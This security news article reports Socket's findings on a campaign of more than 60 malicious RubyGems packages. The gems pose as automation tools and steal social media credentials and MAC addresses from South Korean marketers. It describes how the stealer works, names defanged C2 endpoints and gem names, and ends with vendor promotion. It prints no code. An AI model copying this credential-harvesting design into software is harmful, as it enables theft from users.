Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials

Socket’s Threat Research Team has exposed a persistent campaign involving over 60 malicious RubyGems packages that masquerade as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver.

Active since at least March 2023, the threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje has deployed these gems to deliver legitimate functionalities like bulk posting and engagement boosting while covertly exfiltrating user credentials and system identifiers.

Classified as infostealer malware, these packages primarily target Windows environments, with a focus on South Korean users evident from Korean-language graphical user interfaces (GUIs) built using Glimmer-DSL-LibUI and exfiltration to .kr domains.

Long-Running Supply Chain Attack

Collectively garnering over 275,000 downloads, the gems do not necessarily equate to that many compromises, as executions vary and multiple installations may occur on single systems.

Socket has notified the RubyGems security team, requesting removal of the 16 still-active gems under nowon, kwonsoonje, and soonje aliases, while 44 under zon were self-yanked by the actor but persist in caches and installations.

The malware’s core mechanism involves prompting users for platform credentials via Korean-labeled input fields, then immediately transmitting them along with the host’s MAC address via HTTP POST requests to command-and-control (C2) servers like programzon[.]com/auth/program/signin, appspace[.]kr/bbs/login_check.php, and marketingduo[.]co[.]kr/bbs/login_check.php.

These endpoints, hosted on PHP-based bulletin boards, serve as credential collection panels, enabling the actor to harvest data for potential resale or further exploitation.

Socket AI Scanner analysis of gems like iuz-64bit reveals identical patterns across the cluster, where credentials and MAC addresses facilitate victim fingerprinting and campaign correlation.

The campaign’s evolution spans multiple waves, introducing support for new platforms every two to three months, with infrastructure redundancy through added C2 domains without retiring predecessors.

Yanking under zon aliases fragments attribution, allowing repackaging and redeployment while evading metadata-based detection.

Targeting Grey-Hat Marketers

Explicitly tailored for South Korean grey-hat marketers engaged in spam, SEO, and synthetic engagement, the gems exploit users’ reliance on disposable accounts and automation tools, enabling undetected operation for over a year.

Victims, often accessing SMM panels like smmdoge[.]com for fake followers, backlink platforms such as SpamZilla for search manipulation, and disposable SMS gateways like smshub[.]org for mass registrations, rarely report breaches due to account disposability.

Infostealer logs from dark web markets like Russian Market confirm infections among marketingduo[.]co[.]kr customers, with systems showing activity on proxy tools from bablosoft[.]com and account marketplaces like accs-market[.]com.

According to the report, Promotion occurs via Korean Telegram and Kakao channels, advertising “auto-backlink programs” and “free top-ranking tools.”

Notably, gems like njongto_duo and jongmogtolon target stock discussion forums, enabling autoposting for equity speculation while stealing credentials, potentially facilitating financial forum manipulation or influence operations.

This dual-use model sustains the campaign by empowering victims’ grey-hat activities while granting the actor persistent access.

Defenders are urged to integrate tools like Socket’s GitHub App for pull request scanning, CLI for install-time alerts, browser extension for ecosystem browsing, and MCP for AI-assisted coding to mitigate such risks in evolving supply chains.

Indicators of Compromise (IOCs)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Download for Free